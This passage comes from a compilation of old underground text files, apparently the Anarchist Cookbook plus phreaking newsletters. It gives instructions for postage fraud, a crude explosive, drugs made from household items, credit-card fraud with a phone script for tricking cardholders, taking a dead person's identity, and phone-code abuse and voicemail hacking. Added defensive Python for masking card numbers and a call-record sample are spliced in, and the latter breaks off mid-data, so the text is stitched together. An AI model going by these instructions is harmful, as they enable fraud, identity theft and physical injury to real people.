save a tree. The glue is most efficiently applied with a brush with stiff, short
bristles. Just dip the brush directly into the glue and spread it on evenly,
covering the entire surface of the stamp. It will dry in
about 15 minutes. For mailing packages, just follow the same procedure as
outlined above; however, the package should be weighed and checked to make sure
that it has the correct amount of
postage on it before it is taken to the Post Office. Removing the cancellation
and the glue from the stamps can be easily accomplished by soaking the stamps in
warm water until they float free from the
paper. The stamps can then be put onto a paper towel to dry. Processing stamps
in large batches saves time too. Also, it may be helpful to write the word
'Elmer' at the top of the letter (not on the
envelope) to cue the receiving party in that the stamps have been protected with
the glue. We all know that mailing packages can be expensive. And we also know
that the handicapped are sometimes
discriminated against in jobs. The Government, being the generous people they
are, have given the blind free postal service. Simply address you envelope as
usual, and make one modification. In the
corner where the stamp would go, write in (or stamp) the words 'FREE MATTER FOR
THE BLIND". Then drop you package or letter in one of the blue federal
mailboxes. DO NOT TAKE THE
LETTER TO THE POST OFFICE, OR LEAVE IT IN YOUR MAILBOX. Sounds very nice of the
government to do this, right? Well, they aren't that nice. The parcel is sent
library rate, that is
below third class. It may take four to five days to send a letter to just the
next town. This too is quite simple, but less effective. Put the address that
you are sending the letter to as the return address. If
you were sending a $20 donation to the pirate's Chest, you would put our address
(PO box 644, Lincoln MA 01773) as the return address. Then you would have to be
careless and forget to put the
stamp on the envelope. A nice touch is to put a bullshit address in the center
of the envelope. Again, you MUST drop the letter in a FEDERAL mailbox. If the
post office doesn't send the letter to the
return address for having no stamp, they will send it back for the reason of "No
such address".
Example:
Pirates Chest Dept. 40DD
P.O. Box 644865
Lincol, Ma. 41773
Tom Bullshit
20 Fake Road
What Ever, XX 99851
One last thing you might try doing is soaking a canceled stamp off of an
envelope, and gluing it onto one you are sending. Then burn the stamp, leaving a
little bit to show that there was one there.
84. Unstable Explosives by The Jolly Roger
Mix solid Nitric Iodine with household ammonia. Wait overnight and then pour off
the liquid. You will be left with a muddy substance. Let this dry till it
hardens. Now throw it at something!!!!
85. Weird Drugs by The Jolly Roger
Bananas:
1. Obtain 15 pounds of ripe yellow bananas.
2. Peel all and eat the fruit. Save the peelings.
3. Scrape all the insides of the peels with a sharp knife.
4. Put all the scraped material in a large pot and add water.
5. Boil 3 or 4 hours until it has attained a solid paste consistency.
6. Spread paste onto cookie sheets and dry in oven for about 20 minutes. This
will result in fine black powder. Usually one will feel the effects after
smoking three to four cigarettes.
Cough syrup:
Mix Robitussion AC with an equal amount of ginger ale and drink. The effect are
sedation and euphoria. Never underestimate the effects of any drug! You can OD
on cough syrup!
Toads:
1. Collect five to ten toads, frogs will not work. The best kind are tree toads.
2. Kill them as painlessly as possible, and skin immediately.
3. Allow the skins to dry in a refrigerator four to five days, or until the
skins are brittle.
4. Now crush the skins into powder and smoke. Due to its bad taste you can mix
it with a more fragrant smoking medium.
Nutmeg:
1. Take several whole nutmegs and grind them up in an old grinder.
2. After the nutmegs are ground. Place in a mortar and pulverize with a pestle.
3. The usual dosage is about 10 or 15 grams. A larger dose may produce excessive
thirst, anxiety, and rapid heart beat, but hallucinations are rare.
Peanuts:
1. Take 1 pound of raw peanuts (not roasted.)
2. Shell them, saving the skins and discarding the shells.
3. Eat the nuts.
4. Grind up the skins and smoke them.
86. The Art of Carding by The Jolly Roger
Obtaining a credit card number: There are many ways to obtain the information
needed to card something. The most important things needed are the card number
and the expiration date. Having the
card-holders name doesn't hurt, but it is not essential. The absolute best way
to obtain all the information needed is by trashing. The way this is done is
simple. You walk around your area or any other
area and find a store, mall, supermarket, etc., that throws their garbage
outside on the sidewalk or dumpster. Rip the bag open and see if you can find
any carbons at all. If you find little shreds of
credit card carbons, then it is most likely not worth your time to tape
together. Find a store that does not rip their carbons at all or only in half.
Another way is to bullshit the number out of someone.
That is call them up and say "Hello, this is Visa security and we have a report
that your card was stolen." They will deny it and you will try to get it out of
them from that point on. You could say, "It
wasn't stolen? Well what is the expiration date and maybe we can fix the
problem.... OK and what is the number on your card?......Thank you very much and
have a nice day." Or think of something
to that degree. Another way to get card numbers is through systems such as TRW
and CBI, this is the hard way, and probably not worth the trouble, unless you
are an expert on the system. Using
credit card numbers posted on BBS's is risky. The only advantage is that there
is a good chance that other people will use it, thus decreasing the chances of
being the sole-offender. The last method of
getting numbers is very good also. In most video rental stores, they take down
your credit card number when you join to back-up your rentals. So if you could
manage to steal the list or make a copy
of it, then you are set for a LONG time. Choosing a victim: Once you have the
card number, it is time to make the order. The type of places that are easiest
to victimize are small businesses that do
mail order or even local stores that deliver. If you have an ad for a place with
something you want and the order number is NOT a 1-800 number then chances are
better that you will succeed.
Ordering
When you call the place up to make the order, you must have several things
readily at hand. These are the things you will need: A name, telephone number,
business phone, card number (4 digit bank
code if the card is MasterCard), expiration date, and a complete shipping and
billing address. I will talk about all of these in detail. A personal tip: When
I call to make an order, it usually goes much
smoother if the person you are talking to is a woman. In many cases they are
more gullible than men. The name: You could use the name on the card or the name
of the person who you are going to
send the merchandise to. Or you could use the name on the card and have it
shipped to the person who lives at the drop (Say it is a gift or something). The
name is really not that important because
when the company verifies the card, the persons name is never mentioned, EXCEPT
when you have a Preferred Visa card. Then the name is mentioned. You can tell if
you have a Preferred Visa card
by the PV to the right of the expiration date on the carbon. No phone all day
long waiting for the company to call (Which they will), then the phone number to
give them as your home-phone could be
one of the following: A number that is ALWAYS busy, a number that ALWAYS rings,
a payphone number, low end of a loop (and you will wait on the other end), or a
popular BBS. NEVER give
them your home phone because they will find out as soon as the investigation
starts who the phone belongs to. The best thing would be to have a payphone call
forward your house (via Cosm The
business number.) When asked for, repeat the number you used for your home
phone. Card number: The cards you will use will be Visa, Mastercard, and
American Express. The best is by far Visa.
It is the most straight-forward. Mastercard is pretty cool except for the bank
code. When they ask for the bank code, they sometimes also ask for the bank that
issued it. When they ask that just say
the biggest bank you know of in your area. Try to avoid American Express. They
tend to lead full scale investigations. Unfortunately, American Express is the
most popular card out. When telling the
person who is taking your call the card number, say it slow, clear, and with
confidence. e.g. CC# is 5217-1234-5678-9012. Pause after each set of four so you
don't have to repeat it. Expiration date:
The date must be at LEAST in that month. It is best to with more than three
months to go. The address: More commonly referred to as the 'drop'. Well the
drop can range from an abandoned building
to your next door neighbors apartment. If you plan to send it to an apartment
building then be sure NOT to include an apartment number. This will confuse UPS
or postage men a little and they will
leave the package in the lobby. Here is a list of various drops: The house next
door whose family is on vacation, the apartment that was just moved out of, the
old church that will be knocked down in
six months, your friends house who has absolutely nothing to do with the type of
merchandise you will buy and who will also not crack under heat from feds, etc..
There are also services that hold
merchandise for you, but personally I would not trust them. And forget about
P.O. Boxes because you need ID to get one and most places don't ship to them
anyway. Other aspects of carding:
Verifying cards, seeing if they were reported stolen. Verifying cards: Stores
need to verify credit cards when someone purchases something with one. They call
up a service that checks to see if the
customer has the money in the bank. The merchant identifies himself with a
merchant number. The service then holds the money that the merchant verified on
reserve. When the merchant sends in the
credit card form, the service sends the merchant the money. The service holds
the money for three days and if no form appears then it is put back into the
bank. The point is that if you want to verify
something then you should verify it for a little amount and odds are that there
will be more in the bank. The good thing about verification is that if the card
doesn't exist or if it is stolen then the service will
tell you. To verify MasterCard and Visa try this number. It is voice:
1-800-327-1111 merchant code is 596719. Stolen cards: Mastercard and Visa come
out with a small catalog every
week where they publish EVERY stolen or fraudulently used card. I get this every
week by trashing the same place on the same day. If you ever find it trashing
then try to get it every week. Identifying
cards: Visa card numbers begin with a 4 and have either 13 or 16 digits.
MasterCard card numbers begin with a 5 and have 16 digits. American Express
begins with a 3 and has 15 digits. They all
have the formats of the following:
3xxx-xxxxxx-xxxxx American Express
4xxx-xxx-xxx-xxx Visa
4xxx-xxxx-xxxx-xxxx Visa
5xxx-xxxx-xxxx-xxxx MasterCard
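Seen from the defender's side, the prefix and length rules listed above are what a log scrubber uses to find card numbers that were written to disk by mistake and mask them. The following is an added example, not part of the original text: the function names and log lines are constructed, the card numbers are the publicly documented processor test numbers, and the Luhn checksum (ISO/IEC 7812) is an addition the text does not mention.

```python
import re
from typing import List, Optional, Tuple

# First digit -> (brand, allowed digit counts), exactly as the text states them.
# Assumption: these era-specific rules are used as-is; modern issuer ranges are wider.
BRAND_RULES = {
    "3": ("American Express", {15}),
    "4": ("Visa", {13, 16}),
    "5": ("MasterCard", {16}),
}

# A candidate is 13 to 16 digits, optionally grouped by single spaces or hyphens,
# and not embedded in a longer run of digits.
CANDIDATE = re.compile(r"(?<!\d)\d(?:[ -]?\d){12,15}(?!\d)")


def luhn_ok(digits: str) -> bool:
    """Luhn checksum: double every second digit from the right, sum, test mod 10."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def classify(digits: str) -> Optional[str]:
    """Return the brand if prefix and length match the rules above, else None."""
    rule = BRAND_RULES.get(digits[:1])
    if rule and len(digits) in rule[1]:
        return rule[0]
    return None


def mask(raw: str) -> str:
    """Replace all but the last four digits with '*', keeping the separators."""
    n_digits = sum(c.isdigit() for c in raw)
    out, seen = [], 0
    for c in raw:
        if c.isdigit():
            seen += 1
            out.append(c if seen > n_digits - 4 else "*")
        else:
            out.append(c)
    return "".join(out)


def _is_pan(raw: str) -> Optional[str]:
    """Brand name if the candidate has a known shape and a valid checksum."""
    digits = re.sub(r"\D", "", raw)
    brand = classify(digits)
    return brand if brand and luhn_ok(digits) else None


def find_pans(line: str) -> List[Tuple[str, str]]:
    """List (brand, masked number) for every probable card number in a line."""
    hits = []
    for m in CANDIDATE.finditer(line):
        brand = _is_pan(m.group())
        if brand:
            hits.append((brand, mask(m.group())))
    return hits


def scrub(line: str) -> str:
    """Return the line with every probable card number masked in place."""
    def repl(m):
        return mask(m.group()) if _is_pan(m.group()) else m.group()
    return CANDIDATE.sub(repl, line)


# Constructed sample log lines (not from the original text).
SAMPLE_LOG = [
    "2024-01-05 12:00:01 checkout ok card=4111-1111-1111-1111 amount=19.99",
    "2024-01-05 12:00:07 amex 3782 822463 10005 declined",
    "2024-01-05 12:00:09 order_id=4111111111111112 shipped",   # fails Luhn
    "2024-01-05 12:00:11 tracking 9400111899223197",           # no brand prefix
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(scrub(entry))
```

The checksum is what keeps order IDs and tracking numbers with a card-like shape from being flagged; shape alone would mask the third sample line as well.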
Gold cards: A gold card simply means that credit is good for $5000. Without a
gold card, credit would be normally $2000. To recognize a gold card on a carbon
there are several techniques:
American Express-none.
Visa-PV instead of CV.
Note-When verifying a PV Visa, you have to have the real name of the cardholder.
Mastercard-An asterisk can signify a gold card, but this changes depending when
the card was issued. I am going to type out a dialog between a carder and the
phone operator to help you get the idea.
Operator: "Over-priced Computer Goods, may I help you?"
Carder: "Hi, I would like to place an order please."
Operator: "Sure, what would you like to order?"
Carder: "400 generic disks and a double density drive."
Operator: "Ok, is there anything else?"
Carder: "No thank you, that's all for today."
Operator: "Ok, how would you like to pay for this? MasterCard or Visa?"
Carder: "Visa."
Operator: "And your name is?"
Carder: "Lenny Lipshitz." (Name on card)
Operator: "And your Visa card number is?"
Carder: "4240-419-001-340" (Invalid card)
Operator: "Expiration date?"
Carder: "06-92."
Operator: "And where would you like the package shipped to?"
Carder: "6732 Goatsgate Port. Paris, Texas, 010166."
Operator: "And what is your home telephone number?"
Carder: "212-724-9970" (This number is actually always busy)
Operator: "I will also need your business phone number in case we have to reach
you."
Carder: "You can reach me at the same number. 212-724-9970"
Operator: "O.K. Thank you very much and have nice day."
Carder: "Excuse me, when will the package arrive?"
Operator: "In six to seven days UPS."
Carder: "Thanks a lot, and have a pleasant day."
Now you wait 6-7 days when the package will arrive to the address which is
really a house up for sale. There will be a note on the door saying, "Hello UPS,
please leave all packages for Lenny
Lipshitz in the lobby or porch. Thanks a lot, Lenny Lipshitz" (Make the
signature half-way convincing)
87. Recognizing credit cards by The Jolly Roger
[Sample: American Express]
XXXX XXXXXX XXXXX
MM/Y1 THRU MM/Y2 Y1
John Doe AX
Explanation:
The first date is the date the person got the card, the second date is the
expiration date, after the expiration date is the same digits in the first year.
The American Express Gold has many more numbers
(I think 6 8 then 8). If you do find a Gold card keep it for it has a $5000.00
backup even when the guy has no money!
[Sample: Master Card]
5XXX XXXX XXXX XXXX
XXXX AAA DD-MM-YY MM/YY
John Doe.
Explanation:
The format varies, I have never seen a card that did not start with a 5XXX there
is another 4 digits on the next line that is sometimes asked for when ordering
stuff, (and rarely a 3 digit letter combo (e.
ANB). The first date is the date the person got the card and the second date is
the expiration date. Master Card is almost always accepted at stores.
[Sample: VISA]
XXXX XXX(X) XXX(X) XXX(X)
MM/YY MM/YY*VISA
John Doe
Explanation:
Visa is the most straight forward of the cards, for it has the name right on the
card itself, again the first date is the date he got the card and the second is
the expiration date. (Sometimes the first date is
left out). The numbers can either be 4 3 3 3 or 4 4 4 4. Visa is also almost
always accepted at stores, therefore, the best of cards to use.
88. How To Create A New Identity by The Walking Glitch
You might be saying, "Hey Glitch, what do I need a new identity for?" The answer
is simple. You might want to go buy liquor somewhere, right? You might want to
go give the cops the false name
when you get busted so you keep your good name, eh? You might even want to use
the new identity for getting a P.O. Box for carding. Sure! You might even want
the stuff for renting yourself a VCR
at some dickless loser of a convenience store. Here we go: Getting a new ID
isn't always easy, no one said it would be. By following these steps, any bozo
can become a new bozo in a couple of
weeks.
STEP 1
The first step is to find out who exactly you'll become. The most secure way is
to use someone's ID who doesn't use it themselves. The people who fit that bill
the best are dead. As an added bonus
they don't go complaining one bit. Go to the library and look through old death
notices. You have to find someone who was born about the same time as you were,
or better yet, a year or two older so
you can buy booze, etc. You should go back as far as you can for the death
because most states now cross index deaths to births so people can't do this in
the future. The cutoff date in Wisconsin is
1979, folks in this grand state gotta look in 1978 or earlier. Anything earlier
there is cool. Now, this is the hardest part if you're younger. Brats that young
happen to be quite resilient, taking falls out of
three story windows and eating rat poison like it's Easter candy, and not a
scratch or dent. There ain't many that die, so ya gotta look your ass off. Go
down to the library and look up all the death
notices you can, if it's on microfilm so much the better. You might have to go
through months of death notices though, but the results are well worth it. You
gotta get someone who died locally in most
instances: the death certificate is filed only in the county of death. Now you
go down to the county courthouse in the county where he died and get the death
certificate, this will cost you around $3-$5
depending on the state you're in. Look at this hunk of paper, it could be your
way to vanish in a cloud of smoke when the right time comes, like right after
that big scam. If you're lucky, the slob's
parents signed him up with social security when he was a snot nosed brat.
That'll be another piece of ID you can get. If not, that's Ok too. It'll be
listed on the death certificate if he has one. If you're
lucky, the stiff was born locally and you can get his birth certificate right
away.
STEP 2
Now check the place of birth on the death certificate, if it's in the same place
you're standing now you're all set. If not, you can mail away for one from that
county but it's a minor pain and it might take a
while to get, the librarian at the desk has listings of where to write for this
stuff and exactly how much it costs. Get the Birth certificate, it's worth the
extra money to get it certified because that's the only
way some people will accept it for ID. When you're getting this stuff the little
forms ask for the reason you want it, instead of writing in "Fuck you", try
putting in the word "Genealogy". They get this all
the time. If the Death certificate looks good for you, wait a day or so before
getting the certified birth certificate in case they recognize someone wanting
it for a dead guy.
STEP 3
Now you're cooking! You got your start and the next part's easy. Crank out your
old Dot matrix printer and run off some mailing labels addressed to you at some
phony address. Take the time to check
your phony address that there is such a place. Hotels that rent by the month or
large apartment buildings are good, be sure to get the right zip code for the
area. These are things that the cops might
notice that will trip you up. Grab some old junk mail and paste your new labels
on them. Now take them along with the birth certificate down to the library.
Get a new library card. If they ask you if you had one before say that you
really aren't sure because your family moved around a lot when you were a kid.
Most libraries will allow you to use letters as a
form of ID when you get your card. If they want more give them a sob story about
how you were mugged and got your wallet stolen with all your identification.
Your card should be waiting for you in
about two weeks. Most libraries ask for two forms of ID, one can be your trusty
Birth Certificate, and they do allow letters addressed to you as a second
form.
STEP 4
Now you got a start, it isn't perfect yet, so let's continue. You should have
two forms of ID now. Throw away the old letters, or better yet stuff them inside
the wallet you intend to use with this stuff. Go
to the county courthouse and show them what nice ID you got and get a state ID
card. Now you got a picture ID. This will take about two weeks and cost about
$5, it's well worth it.
STEP 5
If the death certificate had a social security number on it you can go out and
buy one of those metal SS# cards that they sell. If it didn't, then you got all
kinds of pretty ID that shows exactly who you
are. If you don't yet have an SS#, Go down and apply for one, these are free but
they could take five or six weeks to get, Bureaucrats you know... You can invent
a SS# too if you like, but the motto
of 'THE WALKING GLITCH' has always been "Why not excellence?".
STEP 6
If you want to go whole hog you can now get a bank account in your new name. If
you plan to do a lot of traveling then you can put a lot of money in the account
and then say you lost the account
book. After you get the new book you take out all the cash. They'll hit you with
a slight charge and maybe tie-up your money some, but if you're ever broke in
some small town that bank book will
keep you from being thrown in jail as a vagrant.
ALL DONE?
So kiddies, you got ID for buying booze, but what else? In some towns (the
larger the more likely) the cops if they catch you for something petty like
shoplifting stuff under a certain dollar amount, will
just give you a ticket, same thing for pissing in the street. That's it! No
fingerprints or nothing, just pay the fine (almost always over $100) or appear
in court. Of course they run a radio check on your
ID, you'll be clean and your alter-ego gets a blot on his record. You're free and
clear. That's worth the price of the trouble you've gone through right there. If
you're smart, you'll toss that ID away if this
happens, or better yet, tear off your picture and give the ID to someone you
don't like, maybe they'll get busted with it. If you're a working stiff, here's
a way to stretch your dollar. Go to work for as
long as it takes to get unemployment and then get yourself fired. Go to work
under the other name while you're getting the unemployment. With a couple of sets
of ID, you can live like a king. These
concepts for survival in the new age come to you compliments of THE WALKING
GLITCH.
89. Remote Informer Issue #2 by Tracker, Norman Bates, and Ye Cap'n
Raggers and Braggers
This section is to make you aware of well-known raggers and braggers. Since this
is the first time this section is being printed, we will tell you what
classifies people as raggers and braggers. In the
future issues the top raggers and braggers will be listed in this newsletter to
let the SysOps know who not to let on their board, or to at least keep an eye on.
A ragger is someone who will put
someone else down for something. The person might post a message asking a novice
question about hacking and phreaking, or may say something that is completely
wrong, and a ragger will put
the other person down for what he said, posted, etc. The ones that usually classify
in this category are the ones that think they know it all and consider
themselves right no matter what anyone says. Most
of the users that use codes and consider themselves a master phreaker usually
become raggers.
A bragger is someone who either does or thinks he does know everything, and puts
it upon himself to tell the whole world that he knows it all. This person is
also one who thinks he is better than
everyone else and he believes he is Elite, and no one else is. People who tend
to do this are those who have, for some reason, become well-known in the
underworld, and as a result become a
bragger. Those usually not too well-known will not tend to brag as much as those
who think everyone would love to be their friend and be like them.
A well-known ragger and bragger, The Toad, learned that it does not help to
be one or both of those. He has since changed and is now easily accepted by
most. Most people disliked him
because others they knew had said something bad about him. This is called peer
pressure and is a bad influence to those who are new to the underworld. I would
suggest in the future, to not judge
someone by what others say, but rather by how they act around/to you. The
current most popular Atarian that classifies as a ragger and a bragger is Ace of
Aces, and is well-hated by many users and
SysOps, since he tends to put down anything anyone says and considers himself
the best at writing hacking programs. He is commonly referred to as Ass of Asses
and Ass of Assholes. Even holding an
open mind about this guy, you would soon come to find that what others said
coincides with what you see from him.
A New 950 has arrived!
LDDS, who as mentioned above bought out TMC, is installing a new 950 port to
most major cities. By the time you read this, it should be in almost every area
that supports 950 ports. The
number is 950-1450. This port will dial 976 numbers, but not 700, 800, or 900
numbers. The dialing method for LDDS is: 7 digit code, then even if the code is
bad it will give you a dial tone.
Then dial the area code plus the number. If you have a bad code it will simply
say your call cannot be completed as it was dialed. There is a default code used
on the system that currently works.
The code is simply, 1234567. I have seen codes from 5 different companies and
they all are in the format of 00xxxxx. I do not know what type of software they
use, but I will know by the next
issue exactly what they place on the bills. This could be the answer to a lot of
people's problems with fear of Sprint and ITT, especially AllNets. Just
remember, Tracker is the one who found
this, and all information about it. If someone is seen saying they found this,
then they will be listed in the next issue which will contain an article on
leeches.
Mailbox Systems
Mailbox systems are the link between information and the underworld. If you have
ever called one, then you will know the advantages of having one, especially the
ones that are open to whole
underworld, rather than just a select few. There are two types of mailbox
systems that are widely used. The first type we will talk about is the multiple
mailbox systems, or commonly referred to as
message systems. These systems have several mailboxes set up on one number.
Usually, you can access other mailboxes from that number by pressing '*' or '#'.
Sometimes you just enter the
mailbox number and you are connected. These are the safest systems to use to
protect information from US Sprint and other long distance companies. Since US
Sprint and other companies call the
destination numbers, it is safer to have 800 mailbox systems, and most of the
time, the multiple mailbox systems are on 800 numbers. The passcode on these
systems can vary in length and can
be accessed by several different methods, so it is impossible to explain exactly
how to hack these systems.
The other type is the single mailbox system. These are usually set up in a
reserved prefix in an area code. (Ex: 713-684-6xxx) These systems are usually
controlled by the same type of
hardware/software. To access the area where you enter the passcode, just hit '0'
for a second or so. The passcodes are four (4) digits long. The only way to hack
these is manually. The best
thing you could do is to find one that does not have a recording from a person,
but just the digitized voice. If you hack one that someone already owns, they
will report it and it will not last as long.
Here is a list of mailboxes or prefixes to help you get started
90. Remote Informer Issue #3 by Tracker, Ye Cap'n, Norman Bates
Introduction
It's been a month now, and A LOT has happened. So much, in fact, that the
information will be split into several issues. This should be no shock since I
mentioned in the first issue that we may put
several issues out sometimes. I want to congratulate the readers for finally
contributing to the newsletter. The first two issues were all on information
that I, myself, obtained. Several people gave me
information for these issues, and their handles and information are included in
the articles.
ITT has 9 digits!
For those of you who did not know this, ITT has nine digit codes. They are said
to give better connections to some extent. This info was originally given to us
by Party Beast.
Phreaky Phones Go Down!
The famed Phreaky Phones are down again. Modem Man, the original person that
started them, has said that they will be down until further notice. In the
meantime, other independent boxes are being
started. A listing can be made of current ones on request.
Magnus Adept Gets Busted
Fellow Atarian and well-known phreak Magnus Adept got caught by MCI. Details of
the how, when, and where are not known at this time. He got caught with 150
codes and may have to pay up to
50 dollars for each code.
Sprint Codes Are Dying Fast!
Sprint codes are hard to get and when they are obtained, they tend to die rather
quickly. Phreakers have been saying that the 950-0777 port is dead, but on the
contrary, it is still available in states
that are not highly abused by phreaks. Here again, rumors are being spread.
The Best BBS of the Month
Starting from now on, we will have a BBS of the month. We will choose a BBS,
regardless of computer type, and look at the user participation in phreak
related matters, as well as quality discussions
on the various illegal topics. A BBS can remain the BBS of the month as long as
they reside above the rest of the BBS systems. Even though we will sometimes
bring out more than one issue in a
month, the board will remain BBS of the month until the first issue in the next
month comes out.
This month's BBS of the month is FBI PirateNet. We chose this board because of
the large numbers of posts in the bases, and not only information, but
discussions as well, with a minimum number of
posts from raggers and braggers. The number for it is 516-661-7360. The Sysop of
FBI PirateNet is The Phantom, not to be confused with an earlier NARC.
US Sprint Expected to Trim Staff, Consolidate Divisions
New York -- US Sprint Communications Corp., the troubled long distance carrier,
is expected to announce soon that it will cut its work force by several hundred
people and reduce its seven regional
divisions to 3 operating groups, sources familiar with the company said.
The company's Pacific division is based in Burlingame, CA. The layoffs and
reorganization are part of a plan by US Sprint's new president, Robert H.
Snedaker, to reduce heavy operating losses,
which analysts expect to reach more than $800 million this year.
Snedaker replaced Charles M. Skibo, who was forced to resign in July because
losses were running much higher than the parent companies had expected. Problems
with the company's computerized
billing system also contributed to Skibo's ouster. US Sprint is owned and
operated by the GTE Corp. and United TeleCom.
According to sources close to Snedaker, who was vice chairman and chief
operating officer of United TeleCom, he is planning to consolidate the company's
7 divisions, which operate in the same
geographical regions as the seven regional Bell operating companies, into 3
divisions.
The rationale for the move, according to industry analysts, is that the company
will need a much smaller work force once it begins handling all its phone
traffic on its new fiber optic network, which can
carry a greater number of telephone calls at less cost. Company officials have
said that they expect to have most of the traffic on the network by early next
year. One source said that there would be
more than one round of layoffs in the coming months and that the company
ultimately plans to reduce its 14,000 member work force by 15 percent.
Several top managers are expected to resign as soon as US Sprint centralizes its
marketing and support operations at its headquarters in Kansas City, MO.,
according to a report in the latest issue of
Business Week magazine.
A spokesman for US Sprint said on Friday that the company would not comment on
the rumors. The company is the nation's third largest long distance company,
after the American Telephone and
Telegraph Co. (AT&T) and MCI Communications Co.
Last year, Washington based MCI undertook a similar reorganization in which it
posted a $502½ million loss to write down old inventory and restructure
operations.
Analysts said that if US Sprint is to turn a profit, the company must increase
its market share. "To do this, US Sprint must gain more large business
customers, which account for about 80 percent of
industry revenues," said Robert B. Morris III, Securities in San Francisco.
Morris said that by using a slick marketing campaign to differentiate its
all-fiber telephone network from those of competitors, US Sprint more than
doubled its customer base last year. But "most of
these customers were residential and small business users that added little to
Sprint's bottom line," he added. "If the company expects to be profitable, it
will have to concentrate on providing the best
service to volume users."
Secret Service Cracks Down on Teen Hackers
Mount Lebanon, PA -- The US Secret Service and local police departments have put
a scare into the hacker community with a nationwide crackdown on computer crime
that has resulted in the arrests
of teenage hackers in at least three cities.
"People who monitor the bulletin boards say there are a lot of nervous hackers
out there, wondering who will be arrested next," says Ronald E. Freedman,
vice-president of Advanced Information
Management, a Woodbridge, VA-based computer security firm.
Nine teenagers from Mount Lebanon Junior-Senior High School near Pittsburgh, PA,
were arrested recently and charged with computer fraud. The juveniles allegedly
used home computers to gain
illegal access to a credit card authorization center. They obtained valid credit
card numbers and used them to purchase thousands of dollars worth of mail order
merchandise, the police said.
Freedman says it appears the hackers used some relatively sophisticated
techniques in the scheme, including specially written software that enabled them
to bypass security controls and navigate
through credit records to obtain key information.
Police officials say that the hackers also obtained access codes from pirate
bulletin board systems to make free long distance calls and gain access to
various business and government computers.
The arrests were the result of a 6 week investigation by the Secret Service and
the Mount Lebanon police. The police were tipped off by parents who were
suspicious about how their son managed to
obtain a skateboard valued at $140.
The Secret Service was also involved in investigations that led to the arrests
of several hackers in San Francisco and New York last July.
Secret Service spokesman William Corbett says that although some reports have
portrayed the hackers as part of a national crime ring, the cases are unrelated.
"It's just that a few of these computer
hacking cases came to a head at about the same time," he says.
Federal Legislation enacted in 1984 gives the Secret Service, part of the
Department of the Treasury, a major role in investigating computer crimes. Under
the federal Computer Fraud and Abuse Act
of 1986, computer fraud is a felony that carries a maximum penalty of 5 years
for the first offense, and 10 years for the second. Displaying unauthorized
passwords on hacking bulletin boards carries a
maximum penalty of 1 year in prison for the first offense, and 10 years for the
second.
German Teens Crack NASA
Washington, D.C. -- A group of West German teenagers from the Chaos Computer
Club penetrated a NASA network recently, saying they were doing it to "test the
security."
What they got into was SPAN Net, a computer network with about 700 nodes, which
is actually based at the Goddard Space Center in Maryland. All that's in there
is unclassified data, space science
information, and post-flight data analysis. "Anyone with NASA related research
can apply for access to SPAN" says a spokesman, who adds that the network runs
on DEC VAX hardware. "We
picked up three attempts to gain access and put in security precautions so it
wouldn't happen." His personal opinion is, "We're happy that they couldn't get
back in, and decided to go public." He also
added that NASA has many other networks, many of them classified and "probably
impenetrable. But I do not want to challenge anybody."
How'd they get in? Probably they got a West German NASA licensee, which gave
them a visitor's pass, then they created new passwords with unlimited security
for themselves, after which getting
around the network was easy.
91. Remote Informer Issue #4 by Tracker, Norman Bates, Ye Cap'n
Switching Systems
There are currently three different forms of switching systems that are present
in the United States today. Step by Step (SxS), Crossbar, and the Electronic
Switching System (ESS) make up the group.
Phreaks have always been a little tentative when it comes to "doing their work"
once they have heard about effects of switching systems on their hobby. After
researching this topic, I have found that
there really is not that much to be worried about. Read on, while I share with
you information which I have compiled about all of these switching systems and
their distinct features.
The first switching system that was used in the country was called Step by Step.
This was adopted in 1918 by Bell, and until 1978, they had over 53% of all their
exchanges using Step by Step (SxS).
This system is known for its long, confusing train of switches that are used
for its step by step switching.
Step by Step has many disadvantages to phone users. The switch train becomes
jammed fairly often, and it causes calls to be blocked. Also, SxS does not allow
the use of DTMF dialing. This
accounts for some of the areas in the United States that cannot have touch tone
dialing abilities. A tremendous amount of electricity and maintenance needs to
accompany the SxS switching system,
which makes it even more impractical. All in all, this is probably the most
archaic switching system around.
There are a number of ways to see if you are on SxS. You will notice that there
are no pulsing digits after dialing. Most sources say that the phone company
will sound like many typewriters. SxS does
not offer features such as speed calling, call forwarding, three-way calling,
call waiting, and other such services. Pay phones on SxS also will want your
money before you receive a dial tone. This adds
to the list of disadvantages labeled to that of the Step by Step switching
systems.
Another type of switching system that is prevalent in the United States is
Crossbar. Crossbar has been Bell's primary switcher after 1960, and three types
of it exist: Number 1 Crossbar (1xB),
Number 4 Crossbar (4xB), and the Number 5 Crossbar (5xB). In Crossbar, a
switching matrix is used for all the phones in an area, and when someone calls,
the route is determined and is met up with
the other phone. This matrix is set-up in horizontal and vertical paths. Unlike
other switching systems, in my research, I could not come up with any true and
definite distinguishing features of the
Crossbar switching systems.
The Electronic Switching System (ESS) is yet another switching system used in
the United States and the most used of all three switching systems. ESS is an
extremely advanced and multi-faceted type of
switching system, and is feared by marauders of the phone company everywhere.
With ESS, your phone company is able to know every digit dialed (including
mistakes), who you call, when you
called, and how long you were connected. ESS is also programmed to print out the
numbers of people who make excessive calls to WATS numbers (800 services) or
directory assistance. This
feature of ESS is called 800 Exceptional Calling Report, and has spelled the end
of some forms of continuous code hacks to certain extenders. ESS can also be
programmed to print logs of who called
and abused certain numbers as well. Everything is kept track of in its records.
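The kind of report described above can be pictured as a sliding-window threshold check over call records. This is an added example, not code from the original newsletter or from any switch software; the record format, the ten-minute window, the five-call limit, the 555 sample numbers and the names `is_watched` and `exceptional_calling_report` are all assumptions made for illustration.

```python
from collections import defaultdict, deque
from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed sample call records (not real data), one call per line:
# start time | originating number | dialed number | seconds connected
SAMPLE_CDRS = """\
1987-11-02T09:00:00|312-555-0163|800-555-0110|240
1987-11-02T09:30:00|312-555-0163|800-555-0110|180
1987-11-02T10:00:00|312-555-0163|800-555-0110|300
1987-11-02T10:30:00|312-555-0163|800-555-0110|95
1987-11-02T14:00:00|312-555-0177|800-555-0122|410
1987-11-02T14:45:00|312-555-0177|312-555-1212|35
1987-11-02T16:10:00|312-555-0177|312-555-0102|620
1987-11-02T21:00:05|312-555-0141|800-555-0199|6
1987-11-02T21:00:40|312-555-0141|800-555-0199|5
1987-11-02T21:01:15|312-555-0141|800-555-0199|7
1987-11-02T21:01:50|312-555-0141|800-555-0199|6
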